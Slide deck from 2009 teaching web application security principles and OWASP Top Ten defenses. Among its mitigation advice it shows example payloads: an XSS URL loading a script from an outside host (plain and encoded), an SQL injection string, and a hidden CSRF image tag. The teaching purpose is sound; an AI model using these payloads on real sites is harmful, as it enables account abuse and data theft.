
WEB APPLICATION SECURITY

Don Ankney
June 2009

DISCLAIMER
• This presentation is my own work, done on my own time, and is
not sanctioned or vetted by Microsoft.

• Blame me if it sucks. I’m sure you can find something else to blame Microsoft for if you really want to.

AGENDA
• General Web Application Security Principles:
• Trust

• Data handling

• Principle of least privilege

• Defense in depth

• Challenge your assumptions

• “Think Evil”

• Threat Modeling

• OWASP Top 10

GENERAL PRINCIPLES
How to think about web application security

TRUST
• Trust no one.

• Anything that is not completely under your control should not be trusted.

• “Trust, but verify.”

TRUST BOUNDARIES

[Diagram: nested trust boundaries – the user system, the application, and the database as separate zones]

TRUST BOUNDARIES
• User interaction includes:

• POST, GET, PUT, headers, cookies, AJAX, etc.

• Anything that comes in across the trust boundary.

• Server interaction includes:

• Filesystem, LDAP, logs, other processes.

• Anything outside your codebase.

DATA HANDLING
• Bringing data across a trust boundary means both making sure you
can trust data coming in and properly encoding the data going out.

• The two primary techniques for building trust are validation and
sanitization.

• In both techniques, whitelists are preferable to blacklists.

WHITELISTS V. BLACKLISTS
• A whitelist is simply a list of something you do want or expect.

• A blacklist is a list of things you specifically do not want.

• Blacklists are never comprehensive – an attacker will always think of something you didn’t. This is why we whitelist.

DATA VALIDATION
• Data validation is the act of determining whether or not input
conforms to your expectations.

• For example, if you are expecting a US phone number, you are expecting a ten-digit number that begins with 2-9*.

• Validation doesn’t change the data – it’s a boolean conformity test.

*It’s actually more complex than this.
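A minimal sketch of that boolean test in Python (the function name and the simplified first-digit rule are illustrative, per the footnote above):

```python
import re

# Whitelist pattern: exactly ten digits, the first in 2-9.
# (Real US numbering rules are more complex, as noted above.)
US_PHONE = re.compile(r"[2-9]\d{9}")

def is_valid_us_phone(value: str) -> bool:
    # A pure conformity test: the input is never modified.
    return US_PHONE.fullmatch(value) is not None
```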

DATA SANITIZATION
• Data sanitization modifies the input so that it matches the desired
criteria.

• Following the same example, a phone number might be entered as:

(866)500-6738

• If the number is sanitized with a whitelist that requires ten digits, it would become:

8665006738
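A sketch of that whitelist sanitizer in Python (the function name is illustrative): everything outside the digit whitelist is dropped, and the result can then be validated.

```python
import re

def sanitize_us_phone(value: str) -> str:
    # Whitelist: keep digits only; every other character is discarded.
    return re.sub(r"\D", "", value)
```

Note that sanitization and validation compose: after sanitizing, you would still run the length/first-digit check before trusting the value.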

PRINCIPLE OF LEAST
PRIVILEGE
• Each user should have permissions that allow them to
accomplish a given task, but no more.
• Evaluate your system and come up with role-based scenarios.
What are the common tasks? How are they grouped into user
roles?
• A user may have more than one role, but should never have
more access than they need.

DEFENSE IN DEPTH
• Security is like an onion …
• Always implement the strongest mitigations you can think of.
This is your front line.
• Don’t stop there – build additional layers as fall-back positions.
This is defense in depth.
• Make sure that detection is one of those layers. Design a good
logging system and catch an intruder before he makes it past the
second layer.

CHALLENGE YOUR
ASSUMPTIONS
• Don’t assume that the attacker is using your client software – the user
is always untrusted.

• Don’t assume that the attacker is following your page flow – the front
door may not be the only way in.

• Don’t assume that network defenses solve denial of service. Design


application-level defenses.

• If something needs to be “true” in order for the software to work,


first validate it and then enforce it.

“THINK EVIL”
• Bruce Schneier calls this the “Security Mindset” (blog link).

• Usability can be the enemy of security. When doing UX design, always ask yourself how the feature can be misused.

• It’s difficult to do this systematically.

THREAT MODELING
• Threat modeling is systematic.

• This is a design tool.


• Start with a data flow diagram.

• Add your trust boundaries – all of them.

• Every time you cross a trust boundary, look at both of the connected components
and enumerate the threats.

• Design mitigations for each of those threats.

• That’s it – the rest is implementation. Just make sure you follow through on the
mitigations.

“STRIDE” FRAMEWORK
• Many threat modeling frameworks exist – DREAD, Trike, CVSS, OCTAVE, AS/NZS 4360.

• My preference is the STRIDE taxonomy:

• Spoofing

• Tampering

• Repudiation

• Information Disclosure

• Denial of Service

• Elevation of Privilege

• STRIDE is specifically aimed at developers, not risk managers.

OWASP TOP TEN
The 10 most common web application vulnerabilities

OWASP TOP TEN 2007
• Cross Site Scripting (XSS)

• Injection Flaws

• Malicious File Execution

• Insecure Direct Object Reference

• Cross Site Request Forgery (CSRF)

• Information Leakage and Improper Error Handling

• Broken Authentication and Session Management

• Insecure Cryptographic Storage

• Insecure Communications

• Failure to restrict URL access

CROSS SITE SCRIPTING
• Cross site scripting is an attack against your users. A successful attack
will allow the attacker to run arbitrary JavaScript in a user’s browser.

• The trouble with XSS is that the larger the application, the more
paths data can travel through it. You have to nail all of them.

REFLECTED XSS
• Data from a user is accepted by a page, processed, and returned
to the user.
• This type of vulnerability is often detectable by automated tools,
making it the most common.
• Its scope is limited to the user who submits the malicious
request (often via phishing or other social-engineering attacks).

REFLECTED XSS
• This request simply tells me hello:

http://example.com/hello.cgi?name=Don

• This isn’t as friendly:

http://example.com/hello.cgi?name=<SCRIPT SRC=http://hackerco.de/evil.js></SCRIPT>

• This is the exact same thing (Unicode %u encoding):

http://example.com/hello.cgi?name=%u003c%u0053%u0043%u0052%u0049%u0050%u0054%u0020%u0053%u0052%u0043%u003d%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0068%u0061%u0063%u006b%u0065%u0072%u0063%u006f%u002e%u0064%u0065%u002f%u0065%u0076%u0069%u006c%u002e%u006a%u0073%u003e%u003c%u002f%u0053%u0043%u0052%u0049%u0050%u0054%u003e
PERSISTENT XSS
• Persistent XSS takes exactly the same attack strings, but instead of
returning them right away, they are stored in the application and
displayed to all users who view an infected page.

• Rarer, but much more dangerous.

CROSS SITE SCRIPTING
• To fight XSS, you need to bring data across trust boundaries safely.

• Sanitize incoming data via a whitelist.

• Encode outgoing data properly (usually HTML encoding).
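As a sketch of the output-encoding half, using Python’s standard html module (the hello-page rendering is a stand-in for whatever templating you actually use):

```python
import html

def render_hello(name: str) -> str:
    # Encode on the way out: any markup in the input is
    # displayed as text instead of being executed.
    return "<p>Hello, {}!</p>".format(html.escape(name))
```

With this in place, the <SCRIPT> payload from the earlier slide renders as inert text in the page.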

CROSS SITE SCRIPTING
• A couple of gotchas:

• Attackers often encode the attack strings to bypass whitelists.

• Before checking the whitelist, make sure the input encoding matches the application’s internal representation.

• You may need to do this several times, as attackers sometimes apply multiple layers of encoding.

• Also, internationalization makes this a lot more difficult. If your framework provides this functionality for you, use it – don’t reinvent the wheel.
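One way to sketch the decode-until-stable step in Python (standard %XX decoding via urllib; the non-standard %uXXXX form shown earlier would need extra handling):

```python
from urllib.parse import unquote

def fully_decode(value: str, max_rounds: int = 5) -> str:
    # Decode repeatedly until the string stabilizes, so a double-encoded
    # payload can't slip past a whitelist that only sees the outer layer.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers - reject the input")
```

Only after the value has stabilized should it be checked against the whitelist.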

INJECTION FLAWS
• This is an attack against your server that can allow arbitrary
code execution.
• SQL Injection is the most infamous type of code injection attack.
• Other types of injection include LDAP, XML, HTTP, XPath, PHP,
JSP, Python, Perl …
• Instead of tracking the individual techniques, you can think about
this as interpreter injection.

INTERPRETER INJECTION
• I can think of three ways that code can be injected into an interpreter:
• User input

• Dynamic includes

• Static includes across a trust boundary

• Two of these are architectural – you simply design the application to avoid dynamic or cross-boundary includes.
• User input is brought in across a trust boundary, so it needs to be
validated or sanitized.

SQL INJECTION
• Consider this pseudo-code example:
Query query = "SELECT sensitiveData FROM table WHERE
    table.owner = '" + userNameFromGet + "'";

query.execute();

• What happens if the username is:

' OR '1' = '1

• Remember that thing about trust no one?
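Transcribing the pseudo-code into a runnable Python sketch makes the failure visible (the variable name follows the slide):

```python
def build_query(user_name_from_get: str) -> str:
    # Vulnerable pattern: untrusted input is spliced into the SQL text.
    return ("SELECT sensitiveData FROM table WHERE table.owner = '"
            + user_name_from_get + "'")

# With the malicious "username", the WHERE clause is always true:
# build_query("' OR '1' = '1")
# -> SELECT sensitiveData FROM table WHERE table.owner = '' OR '1' = '1'
```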

SQL INJECTION
• There’s good news about SQL injection. We know how to solve it.

• There are two layers of defense:

• Use stored procedures that exercise the principle of least privilege.

• Use parameterized queries.

• Parameterized queries do the heavy lifting here.

PARAMETERIZED QUERIES
• Here, the structure of the query is separate from its parameters. Even if a parameter produces a functional SQL statement, it is treated as data.

Query query = "SELECT sensitiveData FROM table WHERE
    table.owner = '?1'";
query.setParam(1, userNameFromGet);
query.execute();

• There is no way to bypass this. Parameterized queries are pure win.
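A runnable sketch using Python’s built-in sqlite3 as a stand-in database (the table and column names are illustrative, not from the deck):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE photos (owner TEXT, sensitiveData TEXT)")
conn.execute("INSERT INTO photos VALUES ('don', 'secret')")

def owned_data(user_name):
    # The '?' placeholder keeps query structure separate from data:
    # even SQL-shaped input is matched literally as an owner name.
    return conn.execute(
        "SELECT sensitiveData FROM photos WHERE owner = ?",
        (user_name,),
    ).fetchall()
```

Passing the injection string from the previous slide simply returns no rows – it is just an owner name that matches nothing.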

MALICIOUS FILE EXECUTION
• Just like interpreter injection, this allows an attacker to execute
arbitrary code on your system – only here it is not limited to
interpreted code.

• This is primarily about upload handling, though there are other ways
of getting malicious code onto a server (SMB, attacking the update
process, etc).

MALICIOUS FILE EXECUTION
• Remember that the OS and filesystem are untrusted:

• Do not make system calls from within your code – use libraries to
accomplish the same thing.

• Don’t allow direct reference to the file system. Use a wrapper that
enforces access policy.

• When accepting uploads, obfuscate the file name (asymmetric encryption).
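A sketch of one common filename-obfuscation approach – a random server-side name drawn from the OS CSPRNG, rather than the encryption scheme mentioned above (the names here are illustrative):

```python
import secrets

UPLOADS = {}  # server-side map: random name -> (original name, bytes)

def save_upload(original_name: str, data: bytes) -> str:
    # The client-supplied name (and any path embedded in it) never
    # touches the filesystem; the stored name is random and unguessable.
    token = secrets.token_hex(16)
    UPLOADS[token] = (original_name, data)
    return token
```

The original name is kept only for display; it is never used to locate or execute anything.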

INSECURE DIRECT OBJECT REFERENCE
• This is where a developer exposes an internal implementation object
to the end user – state information and method parameters become
visible.

• Exposed parameters are often things such as account numbers, database keys, filenames, etc.

INSECURE DIRECT OBJECT REFERENCE
• This is a very common example:

http://example.com/photos.cgi?gallery=1

• Here the primary key in the database is exposed as the value “gallery.”

• You can enter any number you like into the URI and view the photos in that gallery.

INSECURE DIRECT OBJECT REFERENCE
• Here’s another common example:

http://example.com/photos.cgi?method=add&gallery=1

• What happens if I put another photographer’s gallery number into the URI?

• What if the content I’m posting is illicit?

• What if I use gallery=999999999999999?

INSECURE DIRECT OBJECT REFERENCE
• Don’t ever directly expose your implementation in this way.

• Write a wrapper class. Remember that the user input is not trusted,
so bring it across the trust boundary safely.

• After you’ve brought it across safely, enforce your security policies – authenticate, authorize, etc.
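A minimal sketch of such a wrapper in Python (the class and method names are hypothetical): the raw key is only honored after an ownership check.

```python
class GalleryStore:
    """Wrapper enforcing access policy before any key is dereferenced."""

    def __init__(self, owners):
        self._owners = owners  # gallery_id -> owning user, never exposed

    def open(self, user, gallery_id):
        # Authorize first; an unknown or foreign key is rejected outright.
        if self._owners.get(gallery_id) != user:
            raise PermissionError("not your gallery")
        return gallery_id
```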

CROSS SITE REQUEST
FORGERY
• Cross Site Request Forgery (CSRF) occurs when the browser
submits a request on an attacker’s behalf.

• Consider this:
http://example.com/transfer.cgi?dest=1&amount=1
• If the user has an active, authenticated session, the attacker can
transfer funds to any account.

CROSS SITE REQUEST
FORGERY
• Yes, this does require a little bit of social engineering – the attacker
has to get a user to click on a link, right?

<img src="http://example.com/transfer.cgi?dest=1&amount=1"
width="1" height="1" alt="">
• Most users would never notice that something happened. Would
you?

CROSS SITE REQUEST
FORGERY
• Solving this is easy. Submit a token with each request. If an attacker can’t predict the
token, they can’t trick the browser into submitting a request on their behalf.

• At the very least, the token needs to be unique to the user. Other common
strategies include session-unique and function-unique tokens.

• If the token is even mildly predictable, then the attacker can play the numbers. Make
it truly unpredictable – it should meet the same standards as your session token.

• If your token involves crypto, use something robust, such as SHA-2.

CROSS SITE REQUEST
FORGERY
<form action="/transfer.cgi" method="post">
<input type="hidden" name="CSRFToken"
value="GUID or something similar">
<input type="text" name="dest" value="1">
<input type="text" name="amount" value="1">
</form>

Notice:
• POST, not GET – posting a form doesn’t leave a token in the referer header
or history.

• The token isn’t stored in the cookie – you have to use a vehicle that isn’t auto-submitted. A header could have worked as well.
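A sketch of token generation and checking in Python (the function names are illustrative): secrets gives an unpredictable value, and hmac.compare_digest avoids leaking the token through a timing side channel.

```python
import hmac
import secrets

def new_csrf_token() -> str:
    # Unpredictable, user/session-bound value; store it server side.
    return secrets.token_urlsafe(32)

def check_csrf(expected: str, submitted: str) -> bool:
    # Constant-time comparison; any mismatch rejects the request.
    return hmac.compare_digest(expected, submitted)
```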

INFORMATION LEAKAGE
• UX folks are always after developers to give their users friendly, informative error
messages when something fails.

• Don’t listen to them.

• Friendly is good, but informative often gives attackers actionable intelligence about
how your application is written.

• This is one of the most common techniques used to discover SQL Injection vulnerabilities.

• Log detailed debug information. Display something generic.

• Make sure the generic messages are uniform – an attacker can use slight inconsistencies in the
error messages to differentiate between error states.
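The log-the-detail, show-the-generic split can be sketched like this (the message text is illustrative):

```python
import logging

log = logging.getLogger("app")
GENERIC = "Something went wrong. Please try again later."

def handle_error(exc: Exception) -> str:
    # Detailed, actionable information goes to the log for operators...
    log.error("request failed: %r", exc)
    # ...while every error state shows the user the same uniform message.
    return GENERIC
```

Because the returned message is identical for every failure, an attacker cannot use response differences to map out error states.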

BROKEN AUTHENTICATION
& SESSION MANAGEMENT
• Identity management is difficult to write well.

• Authentication & session management considerations:

• New account establishment

• Password recovery/change

• Password requirements

• Secure credential storage

• Brute force mitigation

• Identity management middleware integration

• Sufficiently entropic session token generation
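For the last item, a sketch of sufficiently entropic token generation (Python’s secrets module draws from the OS CSPRNG; 32 bytes is an assumption, sized to taste):

```python
import secrets

def new_session_token() -> str:
    # ~256 bits from the OS CSPRNG - not random.random(), not a
    # timestamp, not an incrementing counter.
    return secrets.token_urlsafe(32)
```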

BROKEN AUTHENTICATION
• This is a significant engineering challenge that has already been solved
for you.

• This is one of those things that’s very easy to do almost right, but
difficult to get really right.

• Use a federated identity provider such as OpenID.

INSECURE CRYPTOGRAPHIC STORAGE
• Cryptography is hard. Don’t invent your own ciphers. Don’t
implement an established cipher on your own.

• Not all ciphers are created equal – make sure you’re using a strong
cipher.

• Consult someone smarter than me with crypto concerns – I’m not qualified to advise.

INSECURE
COMMUNICATIONS
• This is the classic eavesdropping scenario. Remember that all data
transmitted in an unencrypted pipe is subject to interception.

• This enables other attacks:

• Man in the middle

• Session stealing

• Replay attacks

• The solution is simple – SSL

• If you can’t SSL everything, do some analysis of the flow through your application.

FAILURE TO RESTRICT URL
ACCESS
• Many application developers assume that because a link is not visible
to an attacker, the attacker will not be able to find it.

• Obscurity is not security – enforce your access policies in the application.

FINAL THOUGHTS
• Security is a lifecycle – it begins when you have that first idea and doesn’t end until the product is retired.

• Ultimately, what we’re talking about is creating a culture of quality. Knowing how to solve these problems isn’t enough. Unless every line of code checked in represents an engineer’s best effort, problems will slip through.

BIBLIOGRAPHY
• Fogie, Seth, Jeremiah Grossman, Robert Hansen, Anton Rager, and Petko D. Petkov. XSS Attacks: Cross Site
Scripting Exploits and Defense. Syngress, 2007.

• Gallagher, Tom, Lawrence Landauer, and Bryan Jeffries. Hunting Security Bugs. Microsoft Press, 2006.

• Howard, Michael, and David LeBlanc. Writing Secure Code, Second Edition. Microsoft Press, 2003.

• Howard, Michael, David LeBlanc, and John Viega. 19 Deadly Sins of Software Security (Security One-Off).
McGraw-Hill Osborne Media, 2005.

• Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Discovering and Exploiting Security
Flaws. Wiley, 2007.

• Swiderski, Frank, and Window Snyder. Threat Modeling (Microsoft Professional). Microsoft Press, 2004.

IF YOU ONLY READ ONE
BOOK ...
• Creative Commons License
• $12.83 @ Lulu.com
• Download a .pdf for free
here.
• Also available in Spanish
and Japanese

I’M WEB 2.0
• Blog: http://hackerco.de

• Linkedin: http://linkedin.com/pub/don-ankney/6/213/651

• Twitter: http://twitter.com/dankney

• E-mail: dankney@hackerco.de

• Black Lodge: http://black-lodge.org

QUESTIONS?
